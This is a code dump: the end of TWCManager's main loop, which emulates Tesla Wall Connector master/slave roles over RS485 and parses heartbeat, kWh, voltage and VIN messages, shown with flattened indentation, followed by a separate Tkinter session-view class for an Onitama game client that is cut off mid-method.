# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur."
% (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
# Update the timestamp of the last reciept of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})

# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.  join() here blocks until the queue has drained, which
# guarantees the saveSettings task above has actually run.
master.backgroundTasksQueue.join()

# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
SessionView.py | import time
import threading
from tkinter import *
import socket
import errno
import OnitamaMessages
class SessionView:
    """Tk window shown while a player waits inside a game session.

    Displays the session/opponent information, lets the host start the
    game and lets either player leave.  A background thread keeps
    draining the (non-blocking) server socket and reacts to incoming
    session messages.

    Quit status codes, readable via GetQuitStatus() after Display()
    returns: 200 window closed without action, 201 session left,
    203 leave message only partially sent, 205 game is starting.
    """

    def __init__(self):
        self._quitStatus = 200          # result code of the last Display() run
        self._username = ""
        self._sessionname = ""
        self._allIncomingTcpData = ""   # not-yet-parsed text received from the server
        self._isClosing = False         # signals the reader thread to stop

    def ReadAllQueuedTcpData(self):
        """Drain everything currently queued on the non-blocking server socket.

        Returns the received text (possibly empty).  On any socket error
        other than EAGAIN/EWOULDBLOCK the process is terminated.
        """
        ret = ''
        err = 0
        i = 0
        while err == 0:
            i = i + 1
            try:
                ret = ret + self._serverSocket.recv(4096).decode()
            except socket.error as e:
                err = e.args[0]
                if err == errno.EAGAIN or err == errno.EWOULDBLOCK:
                    break
                else:
                    # a "real" error occurred
                    print(e)
                    print('Terminating ... ')
                    # BUG FIX: `sys` is never imported in this module, so the
                    # previous sys.exit(1) raised a NameError on this path.
                    # Raise SystemExit directly, which is what sys.exit does.
                    raise SystemExit(1)
        # print('{0}. err: {1}'.format(i, err))
        return ret

    def GetGameStartMessage(self):
        """Return the GamestartMessage that closed the window.

        Only set when the quit status is 205.
        """
        return self._gameStartMessage

    def _processingIncomingMessages(self):
        """Background thread: poll the socket, parse every complete message
        and update the UI until the window is closing."""
        while not self._isClosing:
            print("Processing session info message")
            self._allIncomingTcpData = \
                self._allIncomingTcpData + self.ReadAllQueuedTcpData()
            # First potential readable message
            MessageDto = OnitamaMessages.ParseMessage(self._allIncomingTcpData)
            parseSuccess = MessageDto.GetResult()
            while OnitamaMessages.MessageStringResult_Complete == parseSuccess:
                print("Parsed message successfully")
                # The first message has been successfully cut off
                self._allIncomingTcpData = MessageDto.GetRest()
                # It was possible to parse the message
                MsgObject = MessageDto.GetOnitamaMessage()
                # Session info message: show the opponent and our role.
                if OnitamaMessages.SessionInformationMessage == type(MsgObject):
                    self._entryOpponentName.config(text=MsgObject.GetOppoName())
                    if MsgObject.IsHost():
                        self._infoMessage.set("You are the host.")
                        self._buttonStart.place(x=275, y=80, width=120, height=20)
                    else:
                        self._infoMessage.set("You are the guest.")
                        self._buttonStart.place_forget()
                # Start game message: remember it and close the window.
                if OnitamaMessages.GamestartMessage == type(MsgObject):
                    self._gameStartMessage = MsgObject
                    self._quitStatus = 205
                    self._tkOnitamaClientWindow.destroy()
                del MsgObject
                # See if there are further messages in the string to be processed
                MessageDto = OnitamaMessages.ParseMessage(self._allIncomingTcpData)
                parseSuccess = MessageDto.GetResult()
            # We processed the entire incoming string.
            # Let the thread take a break and give some space to others.
            time.sleep(1)

    def SetSessionName(self, inSessionname):
        """Remember the session name shown in the welcome line."""
        self._sessionname = inSessionname

    def SetSocket(self, inServerSocket):
        """Set the (non-blocking) TCP socket connected to the server."""
        self._serverSocket = inServerSocket

    def SetUserName(self, inUsername):
        """Remember the local player's name shown in the welcome line."""
        self._username = inUsername

    def _leaveSession(self):
        """Send a leave-session message and close the window (status 201,
        or 203 if the message was only partially sent)."""
        LeaveSessionM = OnitamaMessages.LeaveSessionMessage()
        msgLength = len(LeaveSessionM.ToString())
        sentLength = self._serverSocket.send(LeaveSessionM.ToString().encode())
        if msgLength != sentLength:
            print("Sent only {0} chars of message {1}. Aborting...".
                  format(sentLength, LeaveSessionM.ToString()))
            self._quitStatus = 203
        else:
            print("Sent leave session message '{0}'.".format(LeaveSessionM.ToString()))
            self._quitStatus = 201
        self._tkOnitamaClientWindow.destroy()

    def _startSession(self):
        """Ask the server to start the game; the window is closed later,
        when the GamestartMessage comes back from the server."""
        GamestartRequestM = OnitamaMessages.GamestartRequestMessage()
        msgLength = len(GamestartRequestM.ToString())
